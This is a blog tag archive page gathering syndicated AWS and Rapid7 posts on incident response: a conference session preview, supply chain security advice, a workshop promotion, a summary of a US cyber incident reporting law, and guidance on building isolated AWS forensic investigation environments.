Tag Archives: incident response

AWS re:Inforce 2022: Threat detection and incident response track preview

Post Syndicated from Celeste Bishop original https://aws.amazon.com/blogs/security/aws-reinforce-2022-threat-detection-and-incident-response-track-preview/

Register now with discount code SALXTDVaB7y to get $150 off your full conference pass to AWS re:Inforce. For a limited time only and while supplies last.

Today we’re going to highlight just some of the sessions focused on threat detection and incident response that are planned for AWS re:Inforce 2022. AWS re:Inforce is a learning conference focused on security, compliance, identity, and privacy. The event features access to hundreds of technical and business sessions, an AWS Partner expo hall, a keynote featuring AWS Security leadership, and more. AWS re:Inforce 2022 will take place in-person in Boston, MA on July 26-27.

AWS re:Inforce organizes content across multiple themed tracks: identity and access management; threat detection and incident response; governance, risk, and compliance; networking and infrastructure security; and data protection and privacy. This post highlights some of the breakout sessions, chalk talks, builders’ sessions, and workshops planned for the threat detection and incident response track. For additional sessions and descriptions, see the re:Inforce 2022 catalog preview. For other highlights, see our sneak peek at the identity and access management sessions and sneak peek at the data protection and privacy sessions.

Breakout sessions

These are lecture-style presentations that cover topics at all levels and delivered by AWS experts, builders, customers, and partners. Breakout sessions typically include 10–15 minutes of Q&A at the end.

TDR201: Running effective security incident response simulations
Security incidents provide learning opportunities for improving your security posture and incident response processes. Ideally you want to learn these lessons before having a security incident. In this session, walk through the process of running and moderating effective incident response simulations with your organization’s playbooks. Learn how to create realistic real-world scenarios, methods for collecting valuable learnings and feeding them back into implementation, and documenting correction-of-error proceedings to improve processes. This session provides knowledge that can help you begin checking your organization’s incident response process, procedures, communication paths, and documentation.

TDR202: What’s new with AWS threat detection services
AWS threat detection teams continue to innovate and improve the foundational security services for proactive and early detection of security events and posture management. Keeping up with the latest capabilities can improve your security posture, raise your security operations efficiency, and reduce your mean time to remediation (MTTR). In this session, learn about recent launches that can be used independently or integrated together for different use cases. Services covered in this session include Amazon GuardDuty, Amazon Detective, Amazon Inspector, Amazon Macie, and centralized cloud security posture assessment with AWS Security Hub.

TDR301: A proactive approach to zero-days: Lessons learned from Log4j
In the run-up to the 2021 holiday season, many companies were hit by security vulnerabilities in the widespread Java logging framework, Apache Log4j. Organizations were in a reactionary position, trying to answer questions like: How do we figure out if this is in our environment? How do we remediate across our environment? How do we protect our environment? In this session, learn about proactive measures that you should implement now to better prepare for future zero-day vulnerabilities.

TDR303: Zoom’s journey to hyperscale threat detection and incident response
Zoom, a leader in modern enterprise video communications, experienced hyperscale growth during the pandemic. Their customer base expanded by 30x and their daily security logs went from being measured in gigabytes to terabytes. In this session, Zoom shares how their security team supported this breakneck growth by evolving to a centralized infrastructure, updating their governance process, and consolidating to a single pane of glass for a more rapid response to security concerns. Solutions used to accomplish their goals include Splunk, AWS Security Hub, Amazon GuardDuty, Amazon CloudWatch, Amazon S3, and others.

Builders’ sessions

These are small-group sessions led by an AWS expert who guides you as you build the service or product on your own laptop.

TDR351: Using Kubernetes audit logs for incident response automation
In this hands-on builders’ session, learn how to use Amazon CloudWatch and Amazon GuardDuty to effectively monitor Kubernetes audit logs—part of the Amazon EKS control plane logs—to alert on suspicious events, such as an increase in 403 Forbidden or 401 Unauthorized Error logs. Also learn how to automate example incident responses for streamlining workflow and remediation.

TDR352: How to mitigate the risk of ransomware in your AWS environment
Join this hands-on builders’ session to learn how to mitigate the risk from ransomware in your AWS environment using the NIST Cybersecurity Framework (CSF). Choose your own path to learn how to protect, detect, respond, and recover from a ransomware event using key AWS security and management services. Use Amazon Inspector to detect vulnerabilities, Amazon GuardDuty to detect anomalous activity, and AWS Backup to automate recovery. This session is beneficial for security engineers, security architects, and anyone responsible for implementing security controls in their AWS environment.

Chalk talks

Highly interactive sessions with a small audience. Experts lead you through problems and solutions on a digital whiteboard as the discussion unfolds.

TDR231: Automated vulnerability management and remediation for Amazon EC2
In this chalk talk, learn about vulnerability management strategies for Amazon EC2 instances on AWS at scale. Discover the role of services like Amazon Inspector, AWS Systems Manager, and AWS Security Hub in vulnerability management and mechanisms to perform proactive and reactive remediations of findings that Amazon Inspector generates. Also learn considerations for managing vulnerabilities across multiple AWS accounts and Regions in an AWS Organizations environment.

TDR332: Response preparation with ransomware tabletop exercises
Many organizations do not validate their critical processes prior to an event such as a ransomware attack. Through a security tabletop exercise, customers can use simulations to provide a realistic training experience for organizations to test their security resilience and mitigate risk. In this chalk talk, learn about Amazon Managed Services (AMS) best practices through a live, interactive tabletop exercise to demonstrate how to execute a simulation of a ransomware scenario. Attendees will leave with a deeper understanding of incident response preparation and how to use AWS security tools to better respond to ransomware events.

Workshops

These are interactive learning sessions where you work in small teams to solve problems using AWS Cloud security services. Come prepared with your laptop and a willingness to learn!

TDR271: Detecting and remediating security threats with Amazon GuardDuty
This workshop walks through scenarios covering threat detection and remediation using Amazon GuardDuty, a managed threat detection service. The scenarios simulate an incident that spans multiple threat vectors, representing a sample of threats related to Amazon EC2, AWS IAM, Amazon S3, and Amazon EKS, that GuardDuty is able to detect. Learn how to view and analyze GuardDuty findings, send alerts based on the findings, and remediate findings.

TDR371: Building an AWS incident response runbook using Jupyter notebooks
This workshop guides you through building an incident response runbook for your AWS environment using Jupyter notebooks. Walk through an easy-to-follow sample incident using a ready-to-use runbook. Then add new programmatic steps and documentation to the Jupyter notebook, helping you discover and respond to incidents.

TDR372: Detecting and managing vulnerabilities with Amazon Inspector
Join this workshop to get hands-on experience using Amazon Inspector to scan Amazon EC2 instances and container images residing in Amazon Elastic Container Registry (Amazon ECR) for software vulnerabilities. Learn how to manage findings by creating prioritization and suppression rules, and learn how to understand the details found in example findings.

TDR373: Industrial IoT hands-on threat detection
Modern organizations understand that enterprise and industrial IoT (IIoT) yields significant business benefits. However, unaddressed security concerns can expose vulnerabilities and slow down companies looking to accelerate digital transformation by connecting production systems to the cloud. In this workshop, use a case study to detect and remediate a compromised device in a factory using security monitoring and incident response techniques. Use an AWS multilayered security approach and top ten IIoT security golden rules to improve the security posture in the factory.

TDR374: You’ve received an Amazon GuardDuty EC2 finding: What’s next?
You’ve received an Amazon GuardDuty finding drawing your attention to a possibly compromised Amazon EC2 instance. How do you respond? In part one of this workshop, perform an Amazon EC2 incident response using proven processes and techniques for effective investigation, analysis, and lessons learned. Use the AWS CLI to walk step-by-step through a prescriptive methodology for responding to a compromised Amazon EC2 instance that helps effectively preserve all available data and artifacts for investigations. In part two, implement a solution that automates the response and forensics process within an AWS account, so that you can use the lessons learned in your own AWS environments.

If any of the sessions look interesting, consider joining us by registering for re:Inforce 2022. Use code SALXTDVaB7y to save $150 off the price of registration. For a limited time only and while supplies last. Also stay tuned for additional sessions being added to the catalog soon. We look forward to seeing you in Boston!

Celeste Bishop

Celeste Bishop

Celeste is a Product Marketing Manager in AWS Security, focusing on threat detection and incident response solutions. Her background is in experience marketing and also includes event strategy at Fortune 100 companies. Passionate about soccer, you can find her on any given weekend cheering on Liverpool FC, and her local home club, Austin FC.

Charles Goldberg

Charles Goldberg

Charles leads the Security Services product marketing team at AWS. He is based in Silicon Valley and has worked with networking, data protection, and cloud companies. His mission is to help customers understand solution best practices that can reduce the time and resources required for improving their company’s security and compliance outcomes.

How to Strategically Scale Vendor Management and Supply Chain Security

Post Syndicated from AJ Debole original https://blog.rapid7.com/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/

How to Strategically Scale Vendor Management and Supply Chain Security

This post is co-authored by Collin Huber

Recent security events — particularly the threat actor activity from the Lapsu$ group, Spring4Shell, and various new supply-chain attacks — have the security community on high alert. Security professionals and network defenders around the world are wondering what we can do to make the organizations we serve less likely to be featured in an article as the most recently compromised company.

In this post, we’ll articulate some simple changes we can all make in the near future to provide more impactful security guidance and controls to decrease risk in our environments.

Maintain good cyber hygiene

Here are some basic steps that organizations can take to ensure their security posture is in good health and risks are at a manageable level.

1.  Review privileged user activity for anomalies

Take this opportunity to review logs of privileged user activity. Additionally, review instances of changed passwords, as well as any other unexpected activity. Interview the end user to help determine the authenticity of the change. Take into consideration the types of endpoints used across your network, as well as expected actions or any changes to privileges (e.g. privilege escalation).

2. Enforce use of multifactor authentication

Has multifactor authentication (MFA) deployment stalled at your firm? This is an excellent opportunity to revisit deployment of these initiatives. Use of MFA reduces the potential for compromise in a significant number of instances. There are several options for deployment of MFA. Hardware-based MFA methods, such as FIDO tokens, are typically the strongest, and numerous options offer user-friendly ways to use MFA — for example, from a smartphone. Ensure that employees and third parties are trained not to accept unexpected prompts to approve a connection.

3. Understand vendor risks

Does your acquisition process consider the security posture of the vendor in question? Based on the use case for the vendor and the business need, consider the security controls you require to maintain the integrity of your environment. Additionally, review available security reports to identify security controls to investigate further. If a security incident has occurred, consider the mitigating controls that were missing for that vendor. Depending on the response of that vendor and their ability to implement those security controls, determine if this should influence purchase decisions or contract renewal.      

4. Review monitoring and alerts

Review system logs for other critical systems, including those with high volumes of data. Consider reviewing systems that may not store, process, or transmit sensitive data but could have considerable vulnerabilities. Depending on the characteristics of these systems and their mitigating controls, it may be appropriate to prioritize patching, implement additional mitigating controls, and even consider additional alerting.

Always make sure to act as soon as you can. It’s better to enact incident response (IR) plans and de-escalate than not to.

Build a more secure supply chain

Risks are inherent in the software supply chain, but there are some strategies that can help you ensure your vendors are as secure as possible. Here are three key concepts to consider implementing.

1. Enumerate edge connection points between internal and vendor environments

Every organization has ingress and egress points with various external applications and service providers. When new services or vendors are procured, access control lists (ACLs) are updated to accommodate the new data streams — which presents an opportunity to record simple commands for shutting those streams down in the event of a vendor compromise.

Early stages of an incident are often daunting, frustrating, and confusing for all parties involved. Empowering information security (IS) and information technology (IT) teams to have these commands ahead of time decreases the guesswork that needs to be done to create them when an event occurs. This frees up resources to perform other critical elements of your IR plan as appropriate.

One of the most critical elements of incident response is containment. Many vendors will immediately disable external connections when an attack is discovered, but relying on an external party to act in the best interest of your organization is a challenging position for any security professional. If your organization has a list of external connections open to the impacted vendor, creating templates or files to easily cut and paste commands to cut off the connection is an easy step in the planning phase of incident response. These commands can be approved for dispatch by senior leadership and immediately put in place to ensure whatever nefarious behavior occurring on the vendor’s network cannot pass into your environment.

An additional benefit of enumerating and memorializing these commands enables teams to practice them or review them during annual updates of the IRP or tabletop exercises. If your organization does not have this information prepared right now, you have a great opportunity to collaborate with your IS and IT teams to improve your preparedness for a vendor compromise.

Vendor compromises can result in service outages which may have an operational impact on your organization. When your organization is considering ways to mitigate potential risks associated with outages and other supply chain issues, review your business continuity plan to ensure it has the appropriate coverage and provides right-sized guidance for resiliency. It may not make business sense to have alternatives for every system or process, so memorialize accepted risks in a Plan of Action and Milestones (POAM) and/or your Risk Register to record your rationale and demonstrate due diligence.

2. Maintain a vendor inventory with key POCs and SLAs

Having a centralized repository of vendors with key points of contact (POCs) for the account and service-level agreements (SLAs) relevant to the business relationship is an invaluable asset in the event of a breach or attack. The repository enables rapid communication with the appropriate parties at the vendor to open and maintain a clear line of communication, so you can share updates and get critical questions answered in a timely fashion. Having SLAs related to system downtime and system support is also instrumental to ensure the vendor is furnishing the agreed-upon services as promised.

3. Prepare templates to communicate to customers and other appropriate parties

Finally, set up templates for communications about what your team is doing to protect the environment and answer any high-level questions in the event of a security incident. For these documents, it is best to work with legal departments and senior leadership to ensure the amount of information provided and the manner in which it is disclosed is appropriate.

  • Internal communication: Have a formatted memo to easily address some key elements of what is occurring to keep staff apprised of the situation. You may want to include remarks indicating an investigation is underway, your internal environment is being monitored, relevant impacts staff may see, who to contact if external parties have questions, and reiterate how to report unusual device behavior to your HelpDesk or security team.
  • External communication: Communication for the press regarding the investigation or severity of the breach as appropriate.
  • Regulatory notices: Work with legal teams to templatize regulatory notifications to ensure the right data is easily provided by technical teams to be shared in an easy-to-update format.

Complex software supply chains introduce a wide range of vulnerabilities into our environments – but with these strategic steps in place, you can limit the impacts of security incidents and keep risk to a minimum in your third-party vendor relationships.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Sharpen Your IR Capabilities With Rapid7’s Detection and Response Workshop

Post Syndicated from Mikayla Wyman original https://blog.rapid7.com/2022/04/04/sharpen-your-ir-capabilities-with-rapid7s-detection-and-response-workshop/

Sharpen Your IR Capabilities With Rapid7’s Detection and Response Workshop

You’re tasked with protecting your environment, and you’ve invested significant time and resources into deploying and configuring your tools — but how do you know if the security controls you’ve put into place are effective? The challenge continues to grow as attacker tactics, techniques, and procedures (TTPs) constantly evolve. In today’s landscape, a security breach is nearly inevitable.

Amid an ever-changing threat landscape, do you have confidence your tools are able to immediately detect threats when they occur? And more importantly, does your team know how to effectively respond to stop the attack, and do it fast?

While we don’t have a crystal ball to offer, we can help make sure your detection and response plan holds up against a breach.

Say hello to Rapid7’s newest incident response service: the Detection and Response Workshop.

Put your safeguards to the test with a guided attack simulation

The Detection and Response Workshop is a guided exercise led by Rapid7’s digital forensics and incident response (DFIR) experts to confirm that your team can quickly detect threats and evaluate your response procedures against a simulated attack within your environment.

This workshop isn’t a Tabletop Exercise (TTX), an IR Planning engagement, or a Purple Team exercise. We’ll pit your organization’s defenders against the latest attack campaigns, within the tools they use on a daily basis, to test your ability to respond when an incident happens under live conditions, without your company’s reputation at stake.

Each Workshop simulation is tailored to your specific needs and mapped to the MITRE ATT&CK Framework. Throughout the Workshop, our experts make recommendations to help strengthen your program – from existing configurations of tools, products, and devices to analysis processes and documentation.

The workshop itself is hands-on and doesn’t require current use of a Rapid7 product. Any security team can utilize this new service to understand what TTPs an adversary may use against them and make sure their program detects and responds accordingly.

Your team will leave the multi-day workshop feeling confident that you have an understanding of where and how to strengthen your existing IR process and detection and response program. You’ll receive a detailed report of the workshop, including our written assessment and recommendations to build resilience into your response program.

Rapid7 Incident Response consulting services

Security is the core of our business, and IR plays a huge role in the security landscape. Our team of DFIR experts — the same experts that respond to incidents for all 1,200+ of our MDR customers — have decades of experience under their belt that they utilize to analyze your security fit-up from all angles. Our team is complete with experts in threat analysis, forensics, and malware analysis, as well as a deep understanding of industry-leading technologies.

Knowing where your program stands is a crucial part of enhancing it, and our IR team has built specialized services to help your team build resiliency at each stage in the process. We now offer a full Incident Response Service Curriculum, allowing teams to engage in a single course for their IR goals or register for the entire curriculum.

From planning to full attack simulations, your team can level up its skills with tailored guidance and coaching through each course:

  • Course 101: Incident Response Program Development
  • Course 201: Tabletop Exercise (TTX)
  • Course 301: Detection & Response Workshop
  • Course 401: Purple Team Exercise

No matter what stage your team is in building your incident response program, our experts are able to help analyze and provide recommendations for improvement.

The Detection & Response Workshop is available now for all security teams. To learn more, talk to a Rapid7 sales representative by filling out this form today.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

New US Law to Require Cyber Incident Reports

Post Syndicated from Harley Geiger original https://blog.rapid7.com/2022/03/10/new-us-laws-to-require-cyber-incident-reports/

New US Law to Require Cyber Incident Reports

On March 9, 2022, the US Congress passed the Cyber Incident Reporting for Critical Infrastructure Act of 2022. Once signed by the President, it will become law. The law will require critical infrastructure owners and operators to report cyber incidents and ransomware payments. The legislation was developed in the wake of the SolarWinds supply chain attack and recently gained additional momentum from the Russia-Ukraine conflict. This post will walk through highlights from the law.

Rapid7 supports efforts to increase transparency and information sharing in order to strengthen awareness of the cybersecurity threat landscape and prepare for cyberattacks. We applaud passage of the Cyber Incident Reporting for Critical Infrastructure Act.

What’s this law about?

The Cyber Incident Reporting for Critical Infrastructure Act will require critical infrastructure owners and operators — such as water and energy utilities, health care organizations, some IT providers, etc. — to submit reports to the Cybersecurity and Infrastructure Security Agency (CISA) for cybersecurity incidents and ransomware payments. The law will provide liability protections for submitting reports to encourage compliance, but noncompliance can result in a civil lawsuit. The law will also require the government to analyze, anonymize, and share information from the reports to provide agencies, Congress, companies, and the public with a better view of the cyber threat landscape.

An important note about the timeline: The requirements do not take effect until CISA issues a clarifying regulation. The law will require CISA to issue this regulation within 42 months (though CISA may take less time), so the requirements may not be imminent. In the meantime, the Cyber Incident Reporting for Critical Infrastructure Act provides information on what CISA’s future rule must address.

We detail these items from the law below.

Requiring reporting of cyber incidents and ransom payments

  • Report requirement. Critical infrastructure owners and operators must report substantial cybersecurity incidents to CISA, as well as any ransom payments. (However, as described below, this requirement does not come into effect until CISA issues a regulation.)
  • Type of incident. The types of cyber incidents that must be reported shall include actual breaches of sensitive information and attacks that disrupt business or operations. Mere threats or failed attacks do not need to be reported.
  • Report timeline. For a cyber incident, the report must be submitted within 72 hours after the affected organization determines the incident is substantial enough that it must be reported. For ransom payments, the report must be submitted within 24 hours after the payment is made.
  • Report contents. The reports must include a list of information, including attacker tactics and techniques. Information related to the incident must be preserved until the incident is fully resolved.
  • Enforcement. If an entity does not comply with reporting requirements, CISA may issue a subpoena to compel entities to produce the required information. The Justice Department may initiate a civil lawsuit to enforce the subpoena. Entities that do not comply with the subpoena may be found in contempt of court.

CISA rule to fill in details

  • Rule requirement. CISA is required to issue a regulation that will establish details on the reporting requirements. The reporting requirements do not take effect until this regulation is final.
  • Rule timeline. CISA has up to 42 months to finalize the rule (but the agency can choose to take less time).
  • Rule contents. The rule will establish the types of cyber incidents that must be reported, the types of critical infrastructure entities that must report, the content to be included in the reports, the mechanism for submitting the reports, and the details for preserving data related to the reports.

Protections for submitting reports

  • Not used for regulation. Reports submitted to CISA cannot be used to regulate the activities of the entity that submitted the report.
  • Privileges preserved. The covered entity may designate the reports as commercial and proprietary information. Submission of a report shall not be considered a waiver of any privilege or legal protection.
  • No liability for submitting. No court may maintain a cause of action against any person or entity on the sole basis of submitting a report in compliance with this law.
  • Cannot be used as evidence. Reports, and material used to prepare the reports, cannot be received as evidence or used in discovery proceedings in any federal or state court or regulatory body.

What the government will do with the report information

  • Authorized purposes. The federal government may use the information in the reports cybersecurity purposes, responding to safety or serious economic threats, and preventing child exploitation.
  • Rapid response. For reports on ongoing threats, CISA must rapidly disseminate cyber threat indicators and defensive measures with stakeholders.
  • Information sharing. CISA must analyze reports and share information with other federal agencies, Congress, private sector stakeholders, and the public. CISA’s information sharing must include assessment of the effectiveness of security controls, adversary tactics and techniques, and the national cyber threat landscape.

What’s Rapid7’s view of the law?

Rapid7 views the Cyber Incident Reporting for Critical Infrastructure Act as a positive step. Cybersecurity is essential to ensure critical infrastructure is safe, and this law would give federal agencies more insight into attack trends, and would potentially help provide early warnings of major vulnerabilities or attacks in progress before they spread. The law carefully avoids requiring reports too early in the incident response process and provides protections to encourage companies to be open and transparent in their reports.

Still, the Cyber Incident Reporting for Critical Infrastructure Act does little to ensure critical infrastructure has safeguards that prevent cyber incidents from occurring in the first place. This law is unlikely to change the fact that many critical infrastructure entities are under-resourced and, in some cases, have security maturity that is not commensurate with the risks they face. The law’s enforcement mechanism (a potential contempt of court penalty) is not especially strong, and the final reporting rules may not be implemented for another 3.5 years. Ultimately, the law’s effect may be similar to state breach notification laws, which raised awareness but did not prompt widespread adoption of security safeguards for personal information until states implemented data security laws.

So, the Cyber Incident Reporting for Critical Infrastructure Act is a needed and helpful improvement — but, as always, there is more to be done.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Forensic investigation environment strategies in the AWS Cloud

Post Syndicated from Sol Kavanagh original https://aws.amazon.com/blogs/security/forensic-investigation-environment-strategies-in-the-aws-cloud/

When a deviation from your secure baseline occurs, it’s crucial to respond and resolve the issue quickly and follow up with a forensic investigation and root cause analysis. Having a preconfigured infrastructure and a practiced plan for using it when there’s a deviation from your baseline will help you to extract and analyze the information needed to determine the impact, scope, and root cause of an incident and return to operations confidently.

Time is of the essence in understanding the what, how, who, where, and when of a security incident. You often hear of automated incident response, which has repeatable and auditable processes to standardize the resolution of incidents and accelerate evidence artifact gathering.

Similarly, having a standard, pristine, pre-configured, and repeatable forensic clean-room environment that can be automatically deployed through a template allows your organization to minimize human interaction, keep the larger organization separate from contamination, hasten evidence gathering and root cause analysis, and protect forensic data integrity. The forensic analysis process assists in data preservation, acquisition, and analysis to identify the root cause of an incident. This approach can also facilitate the presentation or transfer of evidence to outside legal entities or auditors. AWS CloudFormation templates—or other infrastructure as code (IaC) provisioning tools—help you to achieve these goals, providing your business with consistent, well-structured, and auditable results that allow for a better overall security posture. Having these environments as a permanent part of your infrastructure allows them to be well documented and tested, and gives you opportunities to train your teams in their use.

This post provides strategies that you can use to prepare your organization to respond to secure baseline deviations. These strategies take the form of best practices around Amazon Web Services (AWS) account structure, AWS Organizations organizational units (OUs) and service control policies (SCPs), forensic Amazon Virtual Private Cloud (Amazon VPC) and network infrastructure, evidence artifacts to be collected, AWS services to be used, forensic analysis tool infrastructure, and user access and authorization to the above. The specific focus is to provide an environment where Amazon Elastic Compute Cloud (Amazon EC2) instances with forensic tooling can be used to examine evidence artifacts.

This post presumes that you already have an evidence artifact collection procedure or that you are implementing one and that the evidence can be transferred to the accounts described here. If you are looking for advice on how to automate artifact collection, see How to automate forensic disk collection for guidance.

Infrastructure overview

A well-architected multi-account AWS environment is based on the structure provided by Organizations. As companies grow and need to scale their infrastructure with multiple accounts, often in multiple AWS Regions, Organizations offers programmatic creation of new AWS accounts combined with central management and governance that helps them to do so in a controlled and standardized manner. This programmatic, centralized approach should be used to create the forensic investigation environments described in the strategy in this blog post.

The example in this blog post uses a simplified structure with separate dedicated OUs and accounts for security and forensics, shown in Figure 1. Your organization’s architecture might differ, but the strategy remains the same.

Note: There might be reasons for forensic analysis to be performed live within the compromised account itself, such as to avoid shutting down or accessing the compromised instance or resource; however, that approach isn’t covered here.

Figure 1: AWS Organizations forensics OU example

Figure 1: AWS Organizations forensics OU example

The most important components in Figure 1 are:

  • A security OU, which is used for hosting security-related access and services. The security OU and the associated AWS accounts should be owned and managed by your security organization.
  • A forensics OU, which should be a separate entity, although it can have some similarities and crossover responsibilities with the security OU. There are several reasons for having it within a separate OU and account. Some of the more important reasons are that the forensics team might be a different team than the security team (or a subset of it), certain investigations might be under legal hold with additional access restrictions, or a member of the security team could be the focus of an investigation.

When speaking about Organizations, accounts, and the permissions required for various actions, you must first look at SCPs, a core functionality of Organizations. SCPs offer control over the maximum available permissions for all accounts in your organization. In the example in this blog post, you can use SCPs to provide similar or identical permission policies to all the accounts under the forensics OU, which is being used as a resource container. This policy overrides all other policies, and is a crucial mechanism to ensure that you can explicitly deny or allow any API calls desired. Some use cases of SCPs are to restrict the ability to disable AWS CloudTrail, restrict root user access, and ensure that all actions taken in the forensic investigation account are logged. This provides a centralized way to avoid changing individual policies for users, groups, or roles. Accessing the forensic environment should be done using a least-privilege model, with nobody capable of modifying or compromising the initially collected evidence. For an investigation environment, denying all actions except those you want to list as exceptions is the most straightforward approach. Start with the default of denying all, and work your way towards the least authorizations needed to perform the forensic processes established by your organization. AWS Config can be a valuable tool to track the changes made to the account and provide evidence of these changes.

Keep in mind that once the restrictive SCP is applied, even the root account or those with administrator access won’t have access beyond those permissions; therefore, frequent, proactive testing as your environment changes is a best practice. Also, be sure to validate which principals can remove the protective policy, if required, to transfer the account to an outside entity. Finally, create the environment before the restrictive permissions are applied, and then move the account under the forensic OU.

Having a separate AWS account dedicated to forensic investigations is best to keep your larger organization separate from the possible threat of contamination from the incident itself, ensure the isolation and protection of the integrity of the artifacts being analyzed, and keeping the investigation confidential. Separate accounts also avoid situations where the threat actors might have used all the resources immediately available to your compromised AWS account by hitting service quotas and so preventing you from instantiating an Amazon EC2 instance to perform investigations.

Having a forensic investigation account per Region is also a good practice, as it keeps the investigative capabilities close to the data being analyzed, reduces latency, and avoids issues of the data changing regulatory jurisdictions. For example, data residing in the EU might need to be examined by an investigative team in North America, but the data itself cannot be moved because its North American architecture doesn’t align with GDPR compliance. For global customers, forensics teams might be situated in different locations worldwide and have different processes. It’s better to have a forensic account in the Region where an incident arose. The account as a whole could also then be provided to local legal institutions or third-party auditors if required. That said, if your AWS infrastructure is contained within Regions only in one jurisdiction or country, then a single re-creatable account in one Region with evidence artifacts shared from and kept in their respective Regions could be an easier architecture to manage over time.

An account created in an automated fashion using a CloudFormation template—or other IaC methods—allows you to minimize human interaction before use by recreating an entirely new and untouched forensic analysis instance for each separate investigation, ensuring its integrity. Individual people will only be given access as part of a security incident response plan, and even then, permissions to change the environment should be minimal or none at all. The post-investigation environment would then be either preserved in a locked state or removed, and a fresh, blank one created in its place for the subsequent investigation with no trace of the previous artifacts. Templating your environment also facilitates testing to ensure your investigative strategy, permissions, and tooling will function as intended.

Accessing your forensics infrastructure

Once you’ve defined where your investigative environment should reside, you must think about who will be accessing it, how they will do so, and what permissions they will need.

The forensic investigation team can be a separate team from the security incident response team, the same team, or a subset. You should provide precise access rights to the group of individuals performing the investigation as part of maintaining least privilege.

You should create specific roles for the various needs of the forensic procedures, each with only the permissions required. As with SCPs and other situations described here, start with no permissions and add authorizations only as required while establishing and testing your templated environments. As an example, you might create the following roles within the forensic account:

Responder – acquire evidence

Investigator – analyze evidence

Data custodian – manage (copy, move, delete, and expire) evidence

Analyst – access forensics reports for analytics, trends, and forecasting (threat intelligence)

You should establish an access procedure for each role, and include it in the response plan playbook. This will help you ensure least privilege access as well as environment integrity. For example, establish a process for an owner of the Security Incident Response Plan to verify and approve the request for access to the environment. Another alternative is the two-person rule. Alert on log-in is an additional security measure that you can add to help increase confidence in the environment’s integrity, and to monitor for unauthorized access.

You want the investigative role to have read-only access to the original evidence artifacts collected, generally consisting of Amazon Elastic Block Store (Amazon EBS) snapshots, memory dumps, logs, or other artifacts in an Amazon Simple Storage Service (Amazon S3) bucket. The original sources of evidence should be protected; MFA delete and S3 versioning are two methods for doing so. Work should be performed on copies of copies if rendering the original immutable isn’t possible, especially if any modification of the artifact will happen. This is discussed in further detail below.

Evidence should only be accessible from the roles that absolutely require access—that is, investigator and data custodian. To help prevent potential insider threat actors from being aware of the investigation, you should deny even read access from any roles not intended to access and analyze evidence.

Protecting the integrity of your forensic infrastructures

Once you’ve built the organization, account structure, and roles, you must decide on the best strategy inside the account itself. Analysis of the collected artifacts can be done through forensic analysis tools hosted on an EC2 instance, ideally residing within a dedicated Amazon VPC in the forensics account. This Amazon VPC should be configured with the same restrictive approach you’ve taken so far, being fully isolated and auditable, with the only resources being dedicated to the forensic tasks at hand.

This might mean that the Amazon VPC’s subnets will have no internet gateways, and therefore all S3 access must be done through an S3 VPC endpoint. VPC flow logging should be enabled at the Amazon VPC level so that there are records of all network traffic. Security groups should be highly restrictive, and deny all ports that aren’t related to the requirements of the forensic tools. SSH and RDP access should be restricted and governed by auditable mechanisms such as a bastion host configured to log all connections and activity, AWS Systems Manager Session Manager, or similar.

If using Systems Manager Session Manager with a graphical interface is required, RDP or other methods can still be accessed. Commands and responses performed using Session Manager can be logged to Amazon CloudWatch and an S3 bucket, this allows auditing of all commands executed on the forensic tooling Amazon EC2 instances. Administrative privileges can also be restricted if required. You can also arrange to receive an Amazon Simple Notification Service (Amazon SNS) notification when a new session is started.

Given that the Amazon EC2 forensic tooling instances might not have direct access to the internet, you might need to create a process to preconfigure and deploy standardized Amazon Machine Images (AMIs) with the appropriate installed and updated set of tooling for analysis. Several best practices apply around this process. The OS of the AMI should be hardened to reduce its vulnerable surface. We do this by starting with an approved OS image, such as an AWS-provided AMI or one you have created and managed yourself. Then proceed to remove unwanted programs, packages, libraries, and other components. Ensure that all updates and patches—security and otherwise—have been applied. Configuring a host-based firewall is also a good precaution, as well as host-based intrusion detection tools. In addition, always ensure the attached disks are encrypted.

If your operating system is supported, we recommend creating golden images using EC2 Image Builder. Your golden image should be rebuilt and updated at least monthly, as you want to ensure it’s kept up to date with security patches and functionality.

EC2 Image Builder—combined with other tools—facilitates the hardening process; for example, allowing the creation of automated pipelines that produce Center for Internet Security (CIS) benchmark hardened AMIs. If you don’t want to maintain your own hardened images, you can find CIS benchmark hardened AMIs on the AWS Marketplace.

Keep in mind the infrastructure requirements for your forensic tools—such as minimum CPU, memory, storage, and networking requirements—before choosing an appropriate EC2 instance type. Though a variety of instance types are available, you’ll want to ensure that you’re keeping the right balance between cost and performance based on your minimum requirements and expected workloads.

The goal of this environment is to provide an efficient means to collect evidence, perform a comprehensive investigation, and effectively return to safe operations. Evidence is best acquired through the automated strategies discussed in How to automate incident response in the AWS Cloud for EC2 instances. Hashing evidence artifacts immediately upon acquisition is highly recommended in your evidence collection process. Hashes, and in turn the evidence itself, can then be validated after subsequent transfers and accesses, ensuring the integrity of the evidence is maintained. Preserving the original evidence is crucial if legal action is taken.

Evidence and artifacts can consist of, but aren’t limited to:

Access to the control plane logs mentioned above—such as the CloudTrail logs—can be accessed in one of two ways. Ideally, the logs should reside in a central location with read-only access for investigations as needed. However, if not centralized, read access can be given to the original logs within the source account as needed. Read access to certain service logs found within the security account, such as AWS Config, Amazon GuardDuty, Security Hub, and Amazon Detective, might be necessary to correlate indicators of compromise with evidence discovered during the analysis.

As previously mentioned, it’s imperative to have immutable versions of all evidence. This can be achieved in many ways, including but not limited to the following examples:

  • Amazon EBS snapshots, including hibernation generated memory dumps:
    • Original Amazon EBS disks are snapshotted, shared to the forensics account, used to create a volume, and then mounted as read-only for offline analysis.
  • Amazon EBS volumes manually captured:
    • Linux tools such as dc3dd can be used to stream a volume to an S3 bucket, as well as provide a hash, and then made immutable using an S3 method from the next bullet point.
  • Artifacts stored in an S3 bucket, such as memory dumps and other artifacts:
    • S3 Object Lock prevents objects from being deleted or overwritten for a fixed amount of time or indefinitely.
    • Using MFA delete requires the requestor to use multi-factor authentication to permanently delete an object.
    • Amazon S3 Glacier provides a Vault Lock function if you want to retain immutable evidence long term.
  • Disk volumes:
    • Linux: Mount in read-only mode.
    • Windows: Use one of the many commercial or open-source write-blocker applications available, some of which are specifically made for forensic use.
  • CloudTrail:
  • AWS Systems Manager inventory:
  • AWS Config data:
    • By default, AWS Config stores data in an S3 bucket, and can be protected using the above methods.

Note: AWS services such as KMS can help enable encryption. KMS is integrated with AWS services to simplify using your keys to encrypt data across your AWS workloads.

